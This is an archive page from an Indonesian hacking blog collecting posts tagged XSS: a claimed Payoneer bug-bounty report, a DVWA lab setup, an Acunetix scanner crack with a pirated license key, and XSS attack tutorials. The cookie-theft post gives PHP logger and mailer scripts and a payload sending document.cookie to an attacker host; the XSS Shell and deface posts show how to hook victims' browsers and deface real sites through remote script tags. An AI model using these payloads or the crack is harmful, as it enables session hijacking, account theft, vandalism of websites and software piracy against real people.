Showing posts with label xss. Show all posts
Showing posts with label xss. Show all posts

Payoneer Reward me $500

0 comments


Payoneer adalah sebuah salah satu situs menerima pembayaran online dengan menggunakan sebuah kartu Mastercard, dengan kartu itu anda bisa menarik dana di semua ATM berlogo Mastercard. Payoneer yang saat ini populer untuk pembayaran berbagai bisnis online seperti adf.ly,dan affliate lainya. Namun situs payoneer masih rentan terhadap XSS, saya menemukan kerentanan pada index dan sub directory pada situs tersebut yang memungkinkan attacker melakukan pencurian cookie, dan exploit cookie tersebut.

 
Setelah saya menemukan kerentanan tersebut saya menghubungi team payoneer untuk tindakan lebih lanjut, dan saya menunggu untuk beberapa hari untuk di tambal dan ketika, selesai di tambal mereka menghadiah saya $500 sebagai tanda ucapan terima kasih. Dan dibawah ini adalah sebuah gambar dari kerentanan XSS tersebut.



gambar dibawah ini adalah konfirmasi dari payoneer.



 dan ketika saya login ke akun payoneer saya dan bertambah saldo $500 dari payoneer


Jika anda ingin mendapatkan kartu debit dari payoneer gratis anda bisa mendaftar disini. dengan kartu Payoneer ini anda bisa verified Paypal,Payza,belanja online dan menerima pembayaran online yang mendukung dengan Payoneer



Enjoy Buddy,,

Pentester dengan DVWA

0 comments

Damn Vulnerable Web Application (DVWA) adalah sebuah Penetrasion testing untuk membuat seorang security professional atau juga bisa disebut security lab, dengan dvwa anda bisa latihan SQLI, XSS, LFI, CSRF, Brute Force. Dvwa menggunakan sebuah pemrograman PHP dan MYSQL karena kita tahu bahwa kebanyakan website menggunakan bahasa Pemrograman PHP. Dengan DVWA anda bisa latihan SQL Injection secara legal tanpa merusak website, karena dijalankan via Localhost. 




Features :
  • SQL Injection
  • Cross Site Scripting (XSS)
  • Remote File Inclusion (RFI)
  • Local File Inclusion (LFI)
  • Command Execution
  • File Upload
  • Brute Force



How to Penetration Testing with DVWA


Perlu anda ketahui bahwa DVWA hanya dijalankan di server Localhost demi keamanan, jadi untuk membuat server Localhost anda harus mendwonload XAMPP, dan install.

Jika anda sudah punya server Local selanjutnya donwload DVWA disini.

File DVWA harus di tempatkan pada folder C:/xampp/htdocs/

untuk installasi silakan anda akses 127.0.0.1/dvwa selanjutnya silakan login dan klik Setup.




dengan tools ini anda bisa melakukan Pentester SQL Injection.




 Pentester Vulnerability XSS





Jika mempunyai pertanyaan silakan  comment di bawah.


Enjoy Hacking,,

Acunetix Web Scanner Vulnerability 8 Full Version

0 comments

Acunetix scanner vulnerability adalah sebuah tools scanner yang berfungsi menscan sebuah website apakah ditemukan sebuah kesalahan atau bug seperti SQL Injection, Cross Site Scripting (XSS) dan bisa menemukan Sub domain website, Site crawler, HTTP Editor, HTTP Sniffer dan lainya. Tools ini sangat bagus untuk melakukan penetration testing seperti menemukan SQLI, XSS,CSRF dan menemukan bug lainya. Dan di bawah ini adalah features dari tools Acunetix Web Scanner Vulnerability. 




Features :
  • AcuSensor Technology
  • An automatic client script analyzer allowing for security testing of Ajax and Web 2.0 applications
  • Industries’ most advanced and in-depth SQL injection and Cross site scripting testing
  • Advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer
  • Visual macro recorder makes testing web forms and password protected areas easy
  • Support for pages with CAPTCHA, single sign-on and Two Factor authentication mechanisms
  • Extensive reporting facilities including PCI compliance reports
  • Multi-threaded and lightning fast scanner crawls hundreds of thousands of pages with ease
  • Intelligent crawler detects web server type and application language
  • Acunetix crawls and analyzes websites including flash content, SOAP and AJAX
  • Port scans a web server and runs security checks against network services running on the server




Installation :

Setelah anda mendownload dan mengextract silakan anda buka file Acunetix 8 full.exe dan setelah berhasil terinstall jangan centang tulisan “Launch Acunetix Web Vulnerabilty Scanner” hal ini yang paling penting di perhatikan saat menginstall.

Selajutnya anda copy file yang bernama Activation.exe dan Wvs.exe ke folder installasi dan Replace.

langkah terakhir jika dibutuhkan Licensi Key and masukan Licensi detail di bawah ini :

License Key : 2e3b81463d2s56ae60dwe77fd54f7d60
Name : Hmily/[LCG]
ComPany : Www.52PoJie.Cn
Email : Hmily@Acunetix.com
Telephone : 110

Software berhasil menjadi full version.,,




Enjoy with Acunetix Full Version .,

XSS Shell

0 comments

XSS Shell adalah sebuah script ASP yang sangat mudah untuk melakukan pentester XSS. Dengan XSS shell ini anda bisa mendapatkan cookie, tanpa harus membuat script dengan PHP maupun Javascript. Saya sering menggunakan XSS shell untuk mempermudahkan saya dalam mencoba suatu situs. Dengan XSS shell kita bisa melakukan keylogger, view source halaman website korban, DDoS, dan lainya. Untuk mengenai fitur XSS shell anda bisa membaca Feature di bawah ini.





Feature :
  • Get Cookie
  • Get Current Page
  • Execute custom Javascript
  • Get Mouse Log
  • Get Keylogger Data
  • Get Clipboard
  • Get Internal IP Address (Firefox - JVM)
  • Check visited links (CSS history hack)
  • Crash Browser (if you don’t like your victim!) 



How to configure XSS Shell


    Pertama yang anda lakukan adalah mendownload Shell tersebut disini. Jika file sudah anda download dan di extract, silakan anda cari hosting gratis yang support dengan ASP atau hosting Jabry.net .

    Silakan anda buka file "xssshell.asp" dan anda cari script berikut :

    // You XSSShell Server
    var SERVER = "http://www.xssshelltest.com:60000/";

    Silakan anda ganti url tersebut dengan url hosting ASP anda. Contoh saya menggunakan Hosting Jabry dengan url : http://users9.jabry.com/nasrul07, maka url tersebut anda menjadi "http://users9.jabry.com/nasrul07/"

    Selanjutnya buka folder Admin dan open file db, dan kita edit source. anda cari dengan code dibawah ini .

    '// DATABASE CONFIGURATION
    Const DBPATH = "C:\XSS Shell\XSSShell-060\db\shell.mdb"

    Untuk mengetahui lokasi database upload file hasil.asp tersbut pada hosting anda. Contoh file lokasi database saya : http://users9.jabry.com/nasrul07/out.asp


    pada gambar diatas menunjukan file lokasi database saya adalah : D:\content\users9\nasrul07, maka saya ganti menjadi "D:\content\users9\nasrul07/db/shell.mdb", silakan anda sesuaikan dengan lokasi file anda.


    Jika semua langkah diatas selesai, silakan anda upload semua file tersebut di hosting tadi. untuk menampilkan halaman admin XSS shell silakan pergi ke http://users9.jabry.com/nasrul07/admin silakan anda sesuaikan dengan url anda. Dan masukan password w00t. Dan dibawah ini adalah halaman interface dari XSS shell admin.




    untuk situs yang rentan XSS kita panggil file xssshell.asp tersebut dengan perintah :

    <script src="http://users9.jabry.com/nasrul07/xssshell.asp"></script>

    anda bisa memasukan script tersebut pada box pencarian dan lainya.

    setelah itu akan ada sebuah IP address dan nomor id Victim.

    dan anda kini bisa menjalankan perintah seperti alert,prompt,cookie,keylogger dan lainya.

    Contoh :

    Saya menggunakan perintah Alert dengan paramater www.nasrul-seven.blogspot.com




    maka akan muncul alert atau pop up seperti gambar dibawah ini :




    jika ada pertanyaan silakan comment di bawah, No SPAM,,,,




    Enjoy Hacking,,,,

    Pencurian cookie dengan XSS

    0 comments
    XSS adalah sebuah kerentanan siitus yang sering saya jumpai pada beberapa situs. Namun kebanyakan Security Researcher memasukan script dengan puncurian cookie. Cookie bisa digunakan untuk mendapatkan Username dan password user, login tanpa harus username dan password, cookie sendiri bisa untuk mendapatkan akun facebook dengan menggunakan tools Wireshark,  tanpa harus mengetahui email dan password korban dengan memanfaatkan Cookie tersebut. Atau di kenal dengan metode Snifers anda bisa mendownload wireshark di postingan saya sebelumnya di top tools Snifers.




    How to stolen cookie 


    Disini saya akan menggunakan tiga metode untuk pencurian cookie yaitu :

    • Membuat file PHP
    • Membuat file Javascript
    • Mengirim ke email
    1. Untuk pencurian cookie dengan metode PHP anda perlu sebuah web hosting gratis dengan support PHP, karena script PHP akan kita upload pada web hosting tersebut.

    Untuk membuat file PHP dengan pencurian cookie anda bisa mengcopy script di bawah ini :

    <!–?php
    $cookie = $HTTP_GET_VARS["cookie"];
    $steal = fopen(“log.txt”, “a”);
    fwrite($steal, $cookie .”\n”);
    fclose($steal);
    ?–>

    Selanjutnya simpan script tersebut dengan nama terserah anda format file extensi .php,  misal curi.php

    setelah file php dibuat selanjutnya membuat file log.txt,  buka program Notepad dan simpan dengan nama log.txt.


    setelah dua file terbuat.
    • Curi.php
    • log.txt
    selanjutnya silakan anda upload kedua file tersebut di web hosting gratisan dan ubah CHMOD menjadi 777. Jadi ketika anda memanggil file curi.php, history cookie akan di simpan pada log.txt.


    2. Metode yang kedua adalah membuat file javascript dengan pencurian cookie. Berbeda dengan file php javascript akan menampilkan pop-up pada browser , seperti menampilkan Pop-up XSS pada dasarnya. Untuk membuat file cookie dengan extensi  Javascript, silakan anda copy script dibawah ini :

    document.write ("Ini adalah Kerentanan XSS menggunakan javascript " + document.cookie);
    alert ("Found XSS pada situs ini...! - |@nasrulseven| " + document.cookie);


    Simpan dengan nama terserah anda dengan extensi .js, misal xss.js, dan silakan anda upload file javascript terbsut di web hosting yang sama anda buat tadi. Maka hasil code javascript tersebut akan mucul pop-up seperti gambar di bawah ini.




    3. Metode yang terakhir adalah mengirimkan cookie tersebut ke alamat email anda. Untuk membuat cookie bisa di kirim ke alamat email anda  silakan copy script php di bawah ini.

    <?php
    $cookie = $HTTP_GET_VARS["cookie"]; mail(“email_anda@gmail.com”, “Stolen
    Cookie XSS”, $cookie);
    ?>

    Untuk yang tulisan dengan font merah silakan anda ganti dengan email anda. Jika email sudah di ganti silakan anda simpan dengan nama send.php atau terserah anda, dan upload. Cookie akan dikirimkan ke email anda ketika anda panggil file send.php. dan hasil cookie akan seperti gambar dibawah.




    Untuk memanggil file tersebut bisa gunakan script :

    <script>location.href=‘http://www.situsagan.com/file.php?cookie=’+document.cookie;</script>

     Contoh :

    htpp://www.situsrentan.com/index.php?search=<script>location.href = ‘http://www.situsgan.com/file.php?cookie=’+document.cookie;</script>


    Untuk tiga metode file CHMOD 777.




    Enjoy Hacking,,,,

    Cara Deface website dengan XSS

    0 comments

    Deface adalah suatu seni dari teknik hacking dengan berbagai tools yang tersedia namun kebanyakan situs yang mengalami deface adalah situs  yang rentan terhadap SQLI. Namun ada juga teknik lain yang untuk deface namun kebanyakan untuk orang awam atau newbie biasanya menggunakan tools Hmei7 yang buatan defacer asal Semarang Indonesia. Namun saya tidak mengajari anda untuk berbuat seperti itu. Kali ini saya akan membahas deface dengan teknik XSS. Cara ini sangat mudah untuk anda lakukan, karena hanya sedikit paste script pada website yang rentan dengan XSS.






    How to deface with XSS


    Silakan anda cari website yang rentan terhadap XSS, dan untuk mengeceknya pada url anda tulis sedikit script HTML atau pada box pencarian. Namun paling sering yang saya temui kebanyakan pada box pencarian yang rentan terhadap XSS.


    Setelah anda mendapatkan situs yang rentan terhadap XSS, silakan anda copy script di bawah ini dan simpan dengan extensi .js atau javascript. Contoh deface.js



    Untuk nama dan gambar anda bisa mengganti dengan yang anda inginkan.


    Selanjutnya anda Upload file Javascript tersebut di hosting gratisan.

    Jika sudah selesai anda panggil script tersebut dengan perintah :

    <script src=http://yoursite.com/your_files.js></script>

    Contoh saya mengupload file deface.js di website saya http://nasrulsevenfoldism.tk/deface.js, maka perintahnya adalah :

    <script src=http://nasrulsevenfoldism.tk/deface.js></script>

    Selanjutnya anda paste script tersebut pada box pencarian, contact atau pada address bar dan lainya. Dan hasilnya akan tampak seperti gambar dibawah ini :







    Enjoy Hacking.,,,,

    Porn.com Vulneralibilty XSS

    1 comments
    This summary is not available. Please click here to view the post.

    Keamanan Scripting

    0 comments



    Ada hal yang cukup penting untuk dibahas bila kita melakukan scripting, yakni tentu saja keamanan dari scripting itu sendiri. Ada banyak serangan yang dapat dilakukan oleh para hacker untuk mengakali situs web yang kita buat, baik dengan client-side maupun server-side scripting. Salah satu contoh serangan yang cukup komprehensif ialah apa yang dinamakan cross side scripting (XSS). 



    What Is XSS ?


    XSS atau cross-site scripting, merupakan sejenis serangan yang ditujukan ke pengguna lainnya. Serangan ini tidak akan memberikan akses root ataupun system dalam server web, serangan ini hanya berusaha mendapatkan informasi yang berkaitan dengan aplikasi web yang digunakan. Aplikasi web ini dapat berupa aplikasi email berbasiskan web, forum online atau situs e-shopping.

    Sebagai contoh sederhana XSS, bayangkan sebuah buku tamu dimana orang-orang dapat berdiskusi tentang tanggapan mereka terhadap sebuah situs, ketika melihat buku tamu tersebut, kita dapat melihat apa yang pengguna sebelumnya komentari tentang situs tersebut, dan kadang kala situs tersebut mengijinkan penggunaan tag HTML, lalu kenapa tidak kita menulis komentar dengan menggunakan huruf ‘comic sans’ dan berwarna merah, sehingga tiap orang dapat melihat komentar kita tersebut. Karena HTML hanyalah sebuah bahasa program script dan browser kita merupakan interpreter untuk hal tersebut. 

    Maka dengan sedikit kreativitas, komentar di buku tamu tadi, kita sisipkan beberapa scrip program rahasia, tentu pengguna lainnya tidak menyadarinya.
    Dengan hadirnya teknologi yang memungkinkan situs web menjadi lebih interaktif dan dinamis, XSS juga mengalami perkembangan. Dengan menggunakan java script memang serangan XSS tidak dapat menghapus isi data di hard drive client, tapi kita mengakses url yang sedang diakses klien, melihat history akses web si klien ataupun melihat cookie yang ada. Hal kecil yang akan membawa dampak besar.

    Memang XSS hadir karena jeleknya pembangunan sebuah situs web. Kita lebih terbiasa dengan keindahan desain dan isi dari situs web kita, tapi tidak cukup peduli dengan rangkaian baris program yang menyusun situs web tersebut, jarang sekali kita melakukan validasi atas broken link atau input yang diberikan oleh user, seperti pada buku tamu di atas – hal yang paling sering digunakan untuk menyisipkan kode curang sang penyerang. Kesuksesan jenis serangan ini bergantung pada dukungan fungsionalitas dibrowser klien untuk menginterpretasikan script tersebut, kebanyakan browser web dapat menginterpretasikan embedded script dalam isi HTML.

    Semoga bermanfaat …..!!!
    jangan lupa kasih comment yaw…..:D


    DMCA.com

    Blog Archive

     

    Site info

    Free counters! ping fast  my blog, website, or RSS feed for Free Yahoo bot last visit powered by MyPagerank.Net Msn bot last visit powered by MyPagerank.Net Text Backlink Exchanges Kostenlose Backlinks bei http://www.backlink-clever.de

    | Hackers Trix 7 © 2010. All Rights Reserved | Template Style by Lord HTML | Design by MBT | Back To Top |

    Your Text Link Here